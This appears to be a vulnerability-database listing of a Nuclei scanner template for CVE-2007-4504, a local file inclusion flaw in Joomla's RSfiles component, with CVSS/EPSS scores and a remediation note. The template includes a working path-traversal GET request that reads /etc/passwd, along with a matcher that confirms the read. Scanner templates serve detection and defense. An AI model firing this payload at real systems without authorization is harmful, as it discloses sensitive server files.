Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2007-4504
HistorySep 27, 2021 - 11:02 a.m.

Joomla! RSfiles <=1.0.2 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
4

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.3 Medium

AI Score

Confidence

Low

0.022 Low

EPSS

Percentile

89.4%

Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a … (dot dot) in the path parameter in a files.display action.

id: CVE-2007-4504

info:
  name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: |
    Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/4307
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
    - https://nvd.nist.gov/vuln/detail/CVE-2007-4504
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2007-4504
    cwe-id: CWE-22
    epss-score: 0.02171
    epss-percentile: 0.89338
    cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla
    product: rsfiles
  tags: cve2007,cve,lfi,edb,joomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fa8b85892e423c5bf35a3d7e57c7a6c92369087bccf959a8ad7952dc814ddd64022100e94750ab323e456ccb7dc737ab126a2d5c160b7190e3e70993be80dd1064a3b4:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.3 Medium

AI Score

Confidence

Low

0.022 Low

EPSS

Percentile

89.4%

Related for NUCLEI:CVE-2007-4504